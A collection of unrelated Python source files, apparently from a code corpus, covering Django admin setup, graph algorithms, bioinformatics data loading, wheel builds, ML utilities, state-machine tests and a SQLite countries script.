class BlacklistAdmin(admin.ModelAdmin):
list_display = ('email', 'type', 'created_at')
list_filter = ('type',)
search_fields = ('email',)
admin.site.register(Blacklist, BlacklistAdmin)
class MessageLogAdmin(admin.ModelAdmin):
list_display = ('email', 'result', 'created_at')
search_fields = ('email',)
admin.site.register(MessageLog, MessageLogAdmin)
|
502013 | import heapq
import collections
class Solution(object):
def findCheapestPrice(self, n, flights, src, dst, K):
graph = collections.defaultdict(dict)
for u, v, w in flights:
graph[u][v] = w
best = {}
pq = [(0, 0, src)]
while pq:
cost, k, place = heapq.heappop(pq)
if k > K+1 or cost > best.get((k, place), float('inf')): continue
if place == dst: return cost
            for nei, wt in graph[place].items():
newcost = cost + wt
if newcost < best.get((k+1, nei), float('inf')):
heapq.heappush(pq, (newcost, k+1, nei))
best[k+1, nei] = newcost
return -1
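# Illustrative check (standard LeetCode 787 example): with n = 3,
# flights = [[0, 1, 100], [1, 2, 100], [0, 2, 500]], src = 0, dst = 2 and K = 1,
# both solutions return 200 (route 0 -> 1 -> 2 with one stop); with K = 0 they return 500.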
class Solution2(object):
def findCheapestPrice(self, n, flights, src, dst, K):
table = [[float('inf')] * n for _ in range(2)]
table[0][src] = 0
table[1][src] = 0
cur = 0
for i in range(K + 1):
pre = cur
cur = 1 - cur
for u, v, w in flights:
table[cur][v] = min(table[cur][v], table[pre][u] + w)
return table[cur][dst] if table[cur][dst] < float('inf') else -1 |
502082 | from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
def paginate(request, objects, ipp):
paginator = Paginator(objects, ipp)
page = request.GET.get('p')
try:
return paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
return paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
return paginator.page(paginator.num_pages)
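# Illustrative usage inside a view (sketch; "Article" is a hypothetical model):
#   page_obj = paginate(request, Article.objects.order_by('-id'), ipp=25)
# The page number is read from the "p" query parameter, e.g. /articles/?p=3.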
|
502085 | from data import load_data_gse
from contextlib import closing
import os
import shutil
import numpy as np
import pandas as pd
import urllib.request as request
def processing_gse96058(clinical):
assert isinstance(clinical, pd.DataFrame), 'Invalid clinical type. It should be a pandas data frame.'
# cleaning clinical markers
clinical = clinical.replace({'NA': None, 'na': None})
del clinical['scan-b_external_id']
clinical['instrument_model'] = clinical['instrument_model'].replace({
'HiSeq 2000': 0, 'NextSeq 500': 1})
lymph_dummies = pd.get_dummies(clinical['lymph_node_group'])
lymph_dummies.columns = ['lymph_node_group_' + c for c in lymph_dummies.columns]
clinical = pd.concat([clinical, lymph_dummies], axis=1)
del clinical['lymph_node_group']
clinical['lymph_node_status'] = clinical['lymph_node_status'].replace({
'NodeNegative': 0, 'NodePositive': 1})
clinical['nhg'] = clinical['nhg'].replace({'G1': 1, 'G2': 2, 'G3': 3})
clinical['nhg_prediction_mgc'] = clinical['nhg_prediction_mgc'].replace({'G2': 2, 'G3': 3})
pam50_dummies = pd.get_dummies(clinical['pam50_subtype'])
pam50_dummies.columns = ['pam50_subtype_' + c for c in pam50_dummies.columns]
clinical = pd.concat([clinical, pam50_dummies], axis=1)
del clinical['pam50_subtype']
for c in clinical.columns:
clinical[c] = clinical[c].astype(float)
#
outcome = pd.DataFrame((clinical['overall_survival_days'] >=
clinical['overall_survival_days'].mean()).astype(float))
outcome.columns = ['risk_group']
# removing clinical markers invalid for
# building high and low risk predictors
for column in ['overall_survival_days', 'overall_survival_event']:
del clinical[column]
# removing estimated values
for c in clinical.columns:
if 'prediction' in c or 'model' in c:
del clinical[c]
return clinical, outcome
def load_data_gse96058(verbose=-1, read_as_ndarray=False):
"""
This method loads the data set of the project GSE96058 available at
https://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE96058.
:param verbose: (int) print logging messages if greater than 0 (default: -1)
:param read_as_ndarray: (bool) reads data as pandas data frame if false and
as numpy ndarray if True (default: False)
:return:
    - clinical (pd.DataFrame): contains a set of clinical markers associated with breast cancer patients,
    - genes (pd.DataFrame): contains gene expression levels associated with breast cancer patients,
- outcome (pd.DataFrame): contains one variable grouping patients in high (0) and low (1) risk
"""
clinical, _, outcome = load_data_gse('GSE96058', processing_gse96058, verbose, read_as_ndarray)
genes = get_gene_expressions(list(clinical.index))
return clinical, genes, outcome
def get_gene_expressions(columns):
base_path = os.path.join(os.path.dirname(__file__), 'GSE96058')
final_genes_filename = os.path.join(base_path, 'genes.csv')
if not os.path.exists(final_genes_filename):
if not os.path.exists(base_path):
os.makedirs(base_path)
filename = 'GSE96058_gene_expression_3273_samples_and_136_replicates_transformed.csv.gz'
ftp_url = 'ftp://ftp.ncbi.nlm.nih.gov/geo/series/GSE96nnn/GSE96058/suppl/' \
'GSE96058_gene_expression_3273_samples_and_136_replicates_transformed.csv.gz'
if not os.path.exists(os.path.join(base_path, filename)):
with closing(request.urlopen(ftp_url)) as r:
with open(os.path.join(base_path, filename), 'wb') as f:
shutil.copyfileobj(r, f)
genes = pd.read_csv(os.path.join(base_path, filename), sep=',')
genes = genes.rename(columns={'Unnamed: 0': 'ID'}).set_index('ID')
genes.columns = columns
if not os.path.isfile(final_genes_filename):
genes.to_csv(os.path.join(final_genes_filename))
else:
genes = pd.read_csv(final_genes_filename, sep=',', index_col='ID')
genes = genes.T
return genes.apply(lambda x: np.exp(x))
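# Illustrative usage (sketch; the first call downloads the 3273-sample expression matrix
# from NCBI GEO, which can take a while):
#   clinical, genes, outcome = load_data_gse96058(verbose=1)
#   print(clinical.shape, genes.shape, outcome['risk_group'].value_counts())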
|
502099 | from subprocess import check_call
import os
import sys
import shutil
SCRIPT_DIR = os.path.dirname(__file__)
REPO_DIR = os.path.abspath(os.getcwd())
ROOT_DIR = os.path.abspath(os.path.join(REPO_DIR, '..'))
print('ROOT_DIR: %s' % ROOT_DIR)
print('REPO_DIR: %s' % REPO_DIR)
from wheel_build_utils import push_dir, push_env
from windows_build_common import DEFAULT_PY_ENVS, venv_paths
def build_wheels(py_envs=DEFAULT_PY_ENVS):
# Install Chemfiles
chfl_build_dir = os.path.join(ROOT_DIR, 'chfl-build')
os.mkdir(chfl_build_dir)
chfl_install_dir = os.path.join(ROOT_DIR, 'chfl')
check_call([
'cmake', '-DCMAKE_INSTALL_PREFIX:PATH=%s' % chfl_install_dir,
'-DCMAKE_POSITION_INDEPENDENT_CODE:BOOL=ON',
'-DCMAKE_BUILD_TYPE:STRING=Release',
'-G', 'Visual Studio 15 2017 Win64',
'../chemfiles/'], cwd=chfl_build_dir)
check_call(['cmake', '--build', '.', '--target', 'install', '--config', 'Release'], cwd=chfl_build_dir)
for py_env in py_envs:
python_executable, \
python_include_dir, \
python_library, \
pip, \
path = venv_paths(py_env)
with push_env(PATH='%s%s%s' % (path, os.pathsep, os.environ['PATH'])):
# Install dependencies
requirements_file = os.path.join(REPO_DIR, 'requirements-dev.txt')
if os.path.exists(requirements_file):
check_call([pip, 'install', '--upgrade', '-r', requirements_file])
check_call([pip, 'install', 'cmake'])
check_call([pip, 'install', 'scikit_build'])
build_type = 'Release'
# Generate wheel
check_call([
python_executable,
'setup.py', 'bdist_wheel',
'--build-type', build_type, '-G', 'Visual Studio 15 2017 Win64',
'--',
'-DPYTHON_EXECUTABLE:FILEPATH=%s' % python_executable,
'-DPYTHON_INCLUDE_DIR:PATH=%s' % python_include_dir,
'-DPYTHON_LIBRARY:FILEPATH=%s' % python_library,
'-DLEMON_EXTERNAL_CHEMFILES:BOOL=ON',
'-Dchemfiles_DIR:PATH=%s' % os.path.join(chfl_install_dir, 'lib', 'cmake', 'chemfiles'),
'-DLEMON_BUILD_PROGS:BOOL=OFF',
])
# Cleanup
check_call([python_executable, 'setup.py', 'clean'])
if __name__ == '__main__':
build_wheels()
|
502111 | from flask_restful import marshal_with
from flask_login import current_user
from flask_restful import fields, abort
from appname.api import Resource, BaseAPISchema, API_VERSION
class CurrentUserInfoSchema(BaseAPISchema):
get_fields = {
'id': fields.String,
'email': fields.String,
'full_name': fields.String,
}
class CurrentUserInfo(Resource):
schema = CurrentUserInfoSchema()
@marshal_with(schema.get_fields)
def get(self):
if not current_user.is_authenticated:
abort(401)
return current_user
|
502114 | import numpy as np
import scipy as sp
import pylab as pl
import glob
import json
import re
from matplotlib.widgets import Slider
def loaddata(alphas=[]):
files = glob.glob("dat-alpha-?.*.json")
alphas, xs, ys = [],[],[]
for f in files:
g = re.search(r"dat-alpha-([0-9]\.[0-9]{1,}).json", f)
alpha = float(g.groups()[0])
t = np.array(json.load(open(f)))[:,1] #np.loadtxt(f, delimiter=',')[:,1]
y,x = np.histogram(t, bins=np.logspace(0, 5, 30))#, normed=True)
y,x = np.histogram(t, bins=np.linspace(1, t.max(), 30))#, normed=True)
x = x[1:]#(x[1:] + x[:-1])/2
x = x[1:]
y = y[1:]
alphas.append(alpha)
xs.append(x)
ys.append(y/(y*x).sum())
return alphas, xs, ys
def rescale(alphas, xs, ys, alphac, sigma, tau):
out = []
for a,x,y in zip(alphas, xs, ys):
out.append([
x/abs(a-alphac)**(-1./sigma),
x**(-tau)*y*abs(a-alphac)**(-1./sigma)
])
return out
def plotall(alphas, xs, ys, alphac=2.25, sigma=1.86, tau=0):
    fig = pl.figure(1)
    pl.clf()
    out = rescale(alphas, xs, ys, alphac, sigma, tau)
for a, o in zip(alphas, out):
pl.loglog(o[0], o[1], 'o-', label=str(a))
pl.legend()
#def slider_plot(alphas, xs, ys, alphac=0.439, sigma=0.397435897436, tau=1.01274038462):
#def slider_plot(alphas, xs, ys, alphac=0.433173076923, sigma=0.419951923077, tau=(187./91-1)):
#def slider_plot(alphas, xs, ys, alphac=0.442548076923, sigma=0.727163461538, tau=1.05528846154):
def slider_plot(alphas, xs, ys, alphac=0.441666666667, sigma=0.535657051282, tau=0):
fig = pl.figure(2)
pl.subplots_adjust(left=0.25, bottom=0.25)
pl.clf()
lines = []
out = rescale(alphas, xs, ys, alphac, sigma, tau)
for a, o in zip(alphas, out):
lines.append(pl.loglog(o[0], o[1], 'o-', label=str(a))[0])
#pl.axis([xs[0].min(), xs[0].max(), ys[0].min(), ys[0].max()])
#pl.legend(loc='lower left')
axcolor = 'white'
    axalpha = pl.axes([0.25, 0.1, 0.65, 0.03], facecolor=axcolor)
    axsigma = pl.axes([0.25, 0.15, 0.65, 0.03], facecolor=axcolor)
    axtau = pl.axes([0.25, 0.20, 0.65, 0.03], facecolor=axcolor)
    print(alphac, sigma, tau)
salpha = Slider(axalpha, r"$\alpha$", 0.2, 0.6, valinit=alphac)
ssigma = Slider(axsigma, r"$\sigma$", 0.05, 1.0, valinit=sigma)
stau = Slider(axtau, r"$\tau$", -1.0, 2.0, valinit=tau)
def update(val):
alphac = salpha.val
sigma = ssigma.val
tau = stau.val
print "alphac =", alphac, "sigma = ", sigma, 'tau = ', tau
out = rescale(alphas, xs, ys, alphac, sigma, tau)
for line, o in zip(lines, out):
line.set_xdata(o[0])
line.set_ydata(o[1])
fig.canvas.draw_idle()
salpha.on_changed(update)
ssigma.on_changed(update)
stau.on_changed(update)
|
502125 | from torch import nn
class Wrapper:
@staticmethod
def get_args(parser):
parser.add('--l1_weight', type=float, default=30.0)
@staticmethod
def get_net(args):
criterion = Criterion(args.l1_weight)
return criterion.to(args.device)
class Criterion(nn.Module):
def __init__(self, weight):
super().__init__()
self.weight = weight
def forward(self, inputs):
fake_rgb = inputs['fake_rgbs']
real_rgb = inputs['target_rgbs']
loss_G_dict = {}
loss_G_dict['l1_rgb'] = self.weight * nn.functional.l1_loss(fake_rgb, real_rgb[:, 0])
return loss_G_dict
|
502151 | import os
import xgboost as xgb
import lightgbm as lgb
import shap
from ml.utils import get_algo_dir
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
def visualize_model(model, X, idx, configuration, namespace, name):
if configuration['enabled'] and idx % configuration['n_iterations'] == 0:
explainer = shap.TreeExplainer(model)
shap_values = explainer.shap_values(X)
shap.summary_plot(shap_values, X, plot_type="bar", show=False)
save_fig(namespace, name, idx, importance_type='shap')
if name == 'XGBOOST':
for i in ['weight', 'cover', 'gain']:
if i == 'gain':
xgb.plot_importance(model.get_score(fmap='', importance_type=i), importance_type=i, max_num_features=20)
else:
xgb.plot_importance(model, importance_type=i, max_num_features=20)
save_fig(namespace, name, idx, importance_type=i)
elif name == 'LIGHTGBM':
for i in ['split', 'gain']:
lgb.plot_importance(model, importance_type=i, max_num_features=20)
save_fig(namespace, name, idx, importance_type=i)
else:
pass
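# Illustrative call (sketch; the paths and configuration dict are assumptions):
#   visualize_model(model, X_valid, idx=100,
#                   configuration={'enabled': True, 'n_iterations': 50},
#                   namespace='runs/exp1', name='XGBOOST')
# Every 50th call this writes the SHAP summary plot plus weight/cover/gain importance
# plots under <namespace>/feature_exploration/.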
def save_fig(namespace, name, idx, importance_type):
folder = os.path.join(namespace, 'feature_exploration')
folder_path = get_algo_dir(folder)
f_path = os.path.join(folder_path, "analyze_features_model_{}_idx_{}_importance_type_{}.png".format(name, idx, importance_type))
if importance_type == 'gain' and name == 'XGBOOST':
plt.savefig(f_path, dpi='figure')
else:
plt.savefig(f_path, bbox_inches="tight", dpi=300)
|
502245 | import difflib
import pdb
import gensim
from time import time
from scipy.spatial.distance import pdist, squareform
import scipy
from numpy import dot
from numpy.linalg import norm
import numpy as np
import pickle
embedding_path = '/scratchd/home/satwik/embeddings/'
print('Loading Word2Vec')
st_time = time()
with open('/scratchd/home/satwik/embeddings/quora_word2vec.pickle', 'rb') as handle:
model = pickle.load(handle)
print('Word2vec Loaded')
etime = (time() - st_time)/60.0
print('Time Taken : {}'.format(etime))
# print('Loading Word2Vec')
# st_time = time()
# model = gensim.models.KeyedVectors.load_word2vec_format(embedding_path+'GoogleNews-vectors-negative300.bin.gz', binary=True)
# print('Word2vec Loaded')
# etime = (time() - st_time)/60.0
# print('Time Taken : {}'.format(etime))
cos_sim = lambda a,b: dot(a, b)/(norm(a)*norm(b))
rbf = lambda a,b, sigma : scipy.exp(-(np.sum( (a-b)**2 ) ** 2 )/ sigma ** 2)
def sent2wvec(s):
v= []
for w in s:
try:
vec = model[w]
v.append(vec)
except:
pass
v = np.array(v)
return v
def sentence_compare(s1, s2, kernel='cos', **kwargs):
l1 = s1.split()
l2 = s2.split()
# pdb.set_trace()
v1= sent2wvec(l1)
v2= sent2wvec(l2)
# v2 = np.array([model.wv.word_vec(w) for w in l2])
score = 0
len_s1 = v1.shape[0]
# pdb.set_trace()
for v in v1:
if kernel == 'cos':
wscore = np.max(np.array([cos_sim(v,i) for i in v2] ))
elif kernel == 'rbf':
wscore = np.max(np.array([rbf(v,i, kwargs['sigma']) for i in v2] ))
else:
print('Error in kernel type')
score += wscore/len_s1
return score
def sent_cosine_sim(X):
d=[]
for i in range(len(X) ):
td=[]
for j in range(len(X) ):
td.append(sentence_compare(X[i], X[j], 'cos'))
d.append(td)
# pdb.set_trace()
A= np.array(d)
print(A.shape)
V = (0.5*A)+ (0.5*A.T)
return V
def sent_rbf(X, sigma=0.5):
d=[]
for i in range(len(X) ):
td=[]
for j in range(len(X) ):
td.append(sentence_compare(X[i], X[j], kernel='rbf', sigma=sigma))
d.append(td)
# pdb.set_trace()
A= np.array(d)
print(A.shape)
V = (0.5*A)+ (0.5*A.T)
return V
if __name__ == '__main__':
sents =[]
sents.append('what is best way to make money online' )
sents.append('what should i do to make money online' )
sents.append('what should i do to earn money online' )
sents.append('what is the easiest way to make money online' )
sents.append('what is the easiest way to earn money online' )
sents.append('what s the easiest way to make money online' )
sents.append('what s the easiest way to earn money online' )
sents.append('what should i do to make money online online' )
sents.append('what is the best way to make money online' )
sents.append('what is the easiest way to make money online online' )
sent_cosine_sim(sents)
|
502255 | from django.conf import settings
from django.template import Library
register = Library()
@register.filter('theme_path')
def theme_path(user):
theme = getattr(user, 'theme', None) or settings.THEMES[0]
return 'bootswatch/dist/%s/bootstrap.min.css' % theme
@register.simple_tag
def has_perm(perm, user, obj=None):
return user.has_perm(perm, obj=obj)
|
502276 | from .errors import log_error, slack_error
from .ssh import ssh_connect
from .pyspark_udf import udf as pyspark_udf
from .fs_cache import s3_cache, json_file, pickle_file
from .timeout import time_limit
from .regres_test import regress
from .sklearn_dec import SKTransform, SKClassify
|
502354 | from userreport.models import UserReport, GraphicsDevice, GraphicsExtension, GraphicsLimit
from django.contrib import admin
class UserReportAdmin(admin.ModelAdmin):
readonly_fields = ['uploader', 'user_id_hash', 'upload_date', 'generation_date', 'data_type', 'data_version',
'data']
fieldsets = [
('User', {'fields': ['uploader', 'user_id_hash']}),
('Dates', {'fields': ['upload_date', 'generation_date']}),
(None, {'fields': ['data_type', 'data_version', 'data']}),
]
list_display = ('uploader', 'user_id_hash', 'data_type', 'data_version', 'upload_date', 'generation_date')
list_filter = ['upload_date', 'generation_date', 'data_type']
search_fields = ['=uploader', '=user_id_hash', 'data']
date_hierarchy = 'upload_date'
class GraphicsDeviceAdmin(admin.ModelAdmin):
pass
class GraphicsExtensionAdmin(admin.ModelAdmin):
pass
class GraphicsLimitAdmin(admin.ModelAdmin):
pass
admin.site.register(UserReport, UserReportAdmin)
admin.site.register(GraphicsDevice, GraphicsDeviceAdmin)
admin.site.register(GraphicsExtension, GraphicsExtensionAdmin)
admin.site.register(GraphicsLimit, GraphicsLimitAdmin)
|
502360 | from abc import ABC, abstractmethod
from typing import Optional
from eth.abc import AtomicDatabaseAPI
from eth2.beacon.db.abc import BaseBeaconChainDB
from eth2.beacon.fork_choice.abc import BaseForkChoice
from eth2.beacon.state_machines.abc import BaseBeaconStateMachine
from eth2.beacon.types.attestations import Attestation
from eth2.beacon.types.blocks import BaseSignedBeaconBlock, BeaconBlock
from eth2.beacon.types.states import BeaconState
from eth2.beacon.typing import Slot
from eth2.clock import Tick
class BaseBeaconChain(ABC):
@abstractmethod
def __init__(
self, chain_db: BaseBeaconChainDB, fork_choice: BaseForkChoice
) -> None:
...
@classmethod
@abstractmethod
def from_genesis(
cls, base_db: AtomicDatabaseAPI, genesis_state: BeaconState
) -> "BaseBeaconChain":
...
@property
@abstractmethod
def db(self) -> BaseBeaconChainDB:
...
@abstractmethod
def get_state_machine(self, slot: Slot) -> BaseBeaconStateMachine:
...
@abstractmethod
def get_canonical_head(self) -> BeaconBlock:
...
@abstractmethod
def get_canonical_head_state(self) -> BeaconState:
...
@abstractmethod
def get_block_by_slot(self, slot: Slot) -> Optional[BaseSignedBeaconBlock]:
...
@abstractmethod
def on_tick(self, tick: Tick) -> None:
...
@abstractmethod
def on_block(
self, block: BaseSignedBeaconBlock, perform_validation: bool = True
) -> None:
...
@abstractmethod
def on_attestation(self, attestation: Attestation) -> None:
...
def advance_state_to_slot(
chain: BaseBeaconChain, target_slot: Slot, state: BeaconState = None
) -> BeaconState:
if state is None:
state = chain.get_canonical_head_state()
current_slot = state.slot
for slot in range(current_slot, target_slot + 1):
slot = Slot(slot)
state_machine = chain.get_state_machine(slot)
state, _ = state_machine.apply_state_transition(state, future_slot=slot)
return state
|
502406 | import torch
# from typed_args import TypedArgs
import argparse
import os
from typing import Dict, List, NewType, Tuple
from tqdm import tqdm
from numpy.lib.format import open_memmap
import numpy as np
from utils.npy_file import NpyFile
from utils.io import dump_pickle
# class Args(TypedArgs):
# def __init__(self):
# parser = argparse.ArgumentParser()
# self.bboxes = parser.add_argument(
# '--bboxes'
# )
# self.output = parser.add_argument(
# '-o', '--output'
# )
# self.num_bboxes: int = parser.add_argument(
# '-n', '--num-bboxes', type=int, default=10
# )
# self.parse_args_from(parser)
parser = argparse.ArgumentParser()
parser.add_argument('--bboxes', help='path to bboxes')
parser.add_argument('-o', '--output', help='output path')
parser.add_argument('-n', '--num-bboxes', type=int, default=5,
help='use N bboxes, 5 is enough, 10 for ablation study')
def load_bboxes(args: argparse.Namespace) -> List[NpyFile]:
splits = os.listdir(args.bboxes)
splits = sorted(splits)
print(splits)
fps = []
for split in tqdm(splits):
fp = NpyFile(os.path.join(args.bboxes, split))
fps.append(fp)
return fps
def get_new_indices(fp: NpyFile, index: int) -> Dict[str, Tuple[int, int]]:
indices = fp.indices
for k in indices.keys():
indices[k][0] += index
return indices
def count_frames(fps: List[NpyFile]) -> int:
res = 0
for fp in fps:
res += len(fp.data)
return res
def main(args):
os.makedirs(args.output, exist_ok=True)
fps = load_bboxes(args)
total_frames = count_frames(fps)
print('total_frames:', total_frames)
new_indices = dict()
new_fp = open_memmap(
os.path.join(args.output, 'data.npy'),
mode='w+',
dtype=np.float32,
shape=(total_frames, 10, 2048)
)
index = 0
for fp in tqdm(fps):
length = len(fp.data)
new_fp[index: index + length] = fp.data
new_indices.update(get_new_indices(fp, index))
index += length
del new_fp
dump_pickle(new_indices, os.path.join(args.output, 'indices.pkl'))
if __name__ == "__main__":
# args = Args()
args = parser.parse_args()
main(args)
|
502429 | from xstate.machine import Machine
lights = Machine(
{
"id": "lights",
"initial": "green",
"states": {
"green": {"on": {"TIMER": "yellow"}, "entry": [{"type": "enterGreen"}]},
"yellow": {"on": {"TIMER": "red"}},
"red": {
"initial": "walk",
"states": {
"walk": {"on": {"COUNTDOWN": "wait"}},
"wait": {"on": {"COUNTDOWN": "stop"}},
"stop": {"on": {"TIMEOUT": "timeout"}},
"timeout": {"type": "final"},
},
"onDone": "green",
},
},
}
)
def test_machine():
yellow_state = lights.transition(lights.initial_state, "TIMER")
assert yellow_state.value == "yellow"
red_state = lights.transition(yellow_state, "TIMER")
assert red_state.value == {"red": "walk"}
def test_machine_initial_state():
assert lights.initial_state.value == "green"
def test_final_state():
red_stop_state = lights.state_from({"red": "stop"})
red_timeout_state = lights.transition(red_stop_state, "TIMEOUT")
assert red_timeout_state.value == "green"
fan = Machine(
{
"id": "fan",
"initial": "fanOff",
"states": {
"fanOff": {
"on": {
"POWER": "#fan.fanOn.hist",
"HIGH_POWER": "fanOn.highPowerHist",
},
},
"fanOn": {
"initial": "first",
"states": {
"first": {"on": {"SWITCH": "second"}},
"second": {"on": {"SWITCH": "third"}},
"third": {},
"hist": {"type": "history", "history": "shallow"},
"highPowerHist": {"type": "history", "target": "third"},
},
"on": {"POWER": "fanOff"},
},
},
}
)
def test_history_state():
on_state = fan.transition(fan.initial_state, "POWER")
assert on_state.value == "fanOn.first"
on_second_state = fan.transition(on_state, "SWITCH")
assert on_second_state.value == "fanOn.second"
off_state = fan.transition(on_second_state, "POWER")
assert off_state.value == "fanOff"
on_second_state = fan.transition(off_state, "POWER")
assert on_second_state.value == "fanOn.second"
def test_top_level_final():
final = Machine(
{
"id": "final",
"initial": "start",
"states": {
"start": {"on": {"FINISH": "end"}},
"end": {"type": "final"},
},
}
)
end_state = final.transition(final.initial_state, "FINISH")
assert end_state.value == "end"
|
502485 | from kivy.uix.screenmanager import Screen
from kivy.lang import Builder
import webbrowser
class ExceptionScreen(Screen):
Builder.load_file('uix/kv/exceptionscreen/exceptionscreen.kv')
def __init__(self, exception_text, **kwargs):
self.exception_text = exception_text
super(ExceptionScreen, self).__init__(**kwargs)
def send_report_to_vk(self, text):
webbrowser.open('https://vk.com/topic-71248303_36001195')
def send_report_to_github(self, text):
webbrowser.open(
'https://github.com/Fogapod/VKBot/issues/new?body=' + text
)
|
502498 | import os
import yaml
import argparse
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--archs', type = str, choices=['TSA'], help = 'our approach')
parser.add_argument('--benchmark', type = str, choices=['FineDiving'], help = 'dataset')
parser.add_argument('--prefix', type = str, default='default', help = 'experiment name')
parser.add_argument('--resume', action='store_true', default=False ,help = 'resume training (interrupted by accident)')
parser.add_argument('--sync_bn', type=bool, default=False)
parser.add_argument('--fix_bn', type=bool, default=True)
parser.add_argument('--test', action='store_true', default=False)
parser.add_argument('--ckpts', type=str, default=None, help='test used ckpt path')
args = parser.parse_args()
if args.test:
if args.ckpts is None:
raise RuntimeError('--ckpts should not be None when --test is activate')
return args
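# Illustrative invocations (sketch; the entry-point script name is an assumption):
#   python main.py --archs TSA --benchmark FineDiving --prefix my_run
#   python main.py --archs TSA --benchmark FineDiving --test --ckpts path/to/ckpt.pth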
def setup(args):
args.config = '{}_TSA.yaml'.format(args.benchmark)
args.experiment_path = os.path.join('./experiments',args.archs, args.benchmark, args.prefix)
if args.resume:
cfg_path = os.path.join(args.experiment_path,'config.yaml')
if not os.path.exists(cfg_path):
print("Failed to resume")
args.resume = False
setup(args)
return
print('Resume yaml from %s' % cfg_path)
with open(cfg_path) as f:
config = yaml.load(f, Loader=yaml.Loader)
merge_config(config, args)
args.resume = True
else:
config = get_config(args)
merge_config(config, args)
create_experiment_dir(args)
save_experiment_config(args)
def get_config(args):
try:
print('Load config yaml from %s' % args.config)
with open(args.config) as f:
config = yaml.load(f, Loader=yaml.Loader)
except:
raise NotImplementedError('%s arch is not supported'% args.archs)
return config
def merge_config(config, args):
for k, v in config.items():
setattr(args, k, v)
def create_experiment_dir(args):
try:
os.makedirs(args.experiment_path)
print('Create experiment path successfully at %s' % args.experiment_path)
except:
pass
def save_experiment_config(args):
config_path = os.path.join(args.experiment_path,'config.yaml')
with open(config_path, 'w') as f:
yaml.dump(args.__dict__, f)
print('Save the Config file at %s' % config_path) |
502518 | import warnings
from typing import Dict
import torch
from torch import nn, optim as optim
from rl_multi_agent import MultiAgent
from utils.misc_util import ensure_shared_grads
def compute_losses_no_backprop(agent: MultiAgent):
full_loss = None
last_losses = {}
for k, loss in agent.loss().items():
loss = loss.squeeze()
last_losses["loss/" + k] = loss.item()
if full_loss is None:
full_loss = loss
elif (full_loss.is_cuda == loss.is_cuda) and (
not full_loss.is_cuda or full_loss.get_device() == loss.get_device()
):
full_loss += loss
else:
warnings.warn("Loss {} is on a different device!".format(k))
assert full_loss is not None
return last_losses
class TrainingCompleteException(Exception):
pass
class EndProcessException(Exception):
pass
def compute_losses_and_backprop(
agent: MultiAgent,
shared_model: nn.Module,
optimizer: optim.Optimizer,
update_lock,
gpu: bool,
retain_graph: bool = False,
skip_backprop: bool = False,
) -> Dict[str, float]:
agent.model.zero_grad()
full_loss = None
last_losses = {}
for k, loss in agent.loss().items():
loss = loss.squeeze()
last_losses["loss/" + k] = loss.item()
if full_loss is None:
full_loss = loss
elif (full_loss.is_cuda == loss.is_cuda) and (
not full_loss.is_cuda or full_loss.get_device() == loss.get_device()
):
full_loss += loss
else:
warnings.warn("Loss {} is on a different device!".format(k))
if full_loss is not None:
if not skip_backprop:
full_loss.backward(retain_graph=retain_graph)
torch.nn.utils.clip_grad_norm_(agent.model.parameters(), 3, "inf")
if update_lock is not None:
update_lock.acquire()
ensure_shared_grads(agent.model, shared_model, gpu=gpu)
optimizer.step()
if update_lock is not None:
update_lock.release()
else:
warnings.warn(
(
"No loss avaliable for agent.\n"
"Episode length: {}\n"
"Rewards: {}\n"
"Actions: {}\n"
"Expert actions: {}\n"
).format(
agent.episode.num_steps_taken_in_episode(),
agent.rewards_per_agent,
agent.actions,
agent.expert_actions,
)
)
return last_losses
|
502532 | import scipy as sp
import numpy as np
from scipy import stats as st
from scipy import linalg as la
import solutions as sol
data=sol.sim_data(sp.array([[108,200],[206,400],[74,140],[4,8]]),100000)
probs=sol.probabilities(data)
pulls=sol.numPulls(probs,1300)
if sum(pulls) != 1300:
    print("Total pulls does not equal M")
else:
if (pulls[0]>320 and pulls[0]<380 and pulls[1]>130 and pulls[1]<190 and pulls[2]>270 and pulls[2]<330):
print("Passed")
else:
print("Number of pulls are not in range")
|
502545 | import peewee
import sqlite3
file = 'Paises.db'
db = peewee.SqliteDatabase(file)
class Pais(peewee.Model):
name = peewee.TextField()
capital = peewee.TextField()
region = peewee.TextField()
languages = peewee.TextField()
flag = peewee.TextField()
class Meta:
database = db
db_table = 'Paises'
def contar_paises():
db.connect()
total = Pais.select().count()
db.close()
return total
def datos_pais(pais = 'Mexico'):
conexion = sqlite3.connect(file)
cursor = conexion.cursor()
    datos = cursor.execute('SELECT * FROM Paises WHERE Nombre = ?', (pais,)).fetchall()
conexion.close()
return datos[0]
def hispanos():
conexion = sqlite3.connect(file)
cursor = conexion.cursor()
paises = cursor.execute('SELECT Nombre, Lenguajes FROM Paises').fetchall()
hispanohablantes = []
    for pais in paises:
        if pais[1] is not None:
            languages = pais[1].split(',')
            if 'spa' in languages:
                hispanohablantes.append(pais[0])
    conexion.close()
    return hispanohablantes
def europa():
conexion = sqlite3.connect(file)
cursor = conexion.cursor()
paises = cursor.execute('SELECT Nombre FROM Paises WHERE Region = "Europe"').fetchall()
conexion.close()
return paises
def main():
print('-Total de Paises: {}'.format(contar_paises()))
print('\n-Datos de México: {}'.format(datos_pais()))
paises = hispanos()
print('\n---Paises Hispanohablantes---')
for pais in paises:
print('\t*' + pais)
paises_europeos = europa()
print('\n---Paises de Europa---')
for pais in paises_europeos:
print('\t*' + pais[0])
if __name__ == '__main__':
main()
|
502553 | import os
def watch_templates(directory):
def wrapper(f):
f.TEMPLATES_DIRECTORY = directory
        f.TEMPLATE_FILES = [name for name in os.listdir(directory) if name.endswith('tpl')]
return f
return wrapper
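# Usage sketch (hypothetical template directory created on the fly): the
# decorator only attaches the watched directory and its '*.tpl' files to the
# decorated callable as attributes; it does not wrap or alter the call itself.
if __name__ == '__main__':
    import tempfile
    _tmp_dir = tempfile.mkdtemp()
    open(os.path.join(_tmp_dir, 'home.tpl'), 'w').close()

    @watch_templates(_tmp_dir)
    def render_home():
        pass

    print(render_home.TEMPLATES_DIRECTORY)  # the watched directory
    print(render_home.TEMPLATE_FILES)       # ['home.tpl']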
|
502568 | from enum import Enum
class ControlInputEnum(Enum):
@classmethod
def allowedValues(cls):
return []
class ControlOperation(ControlInputEnum):
START = 'start'
STOP = 'stop'
NONE = 'none'
SETTINGS = 'settings'
UNKNOWN = 'unknown'
@classmethod
def allowedValues(cls):
return [ControlOperation.START, ControlOperation.STOP]
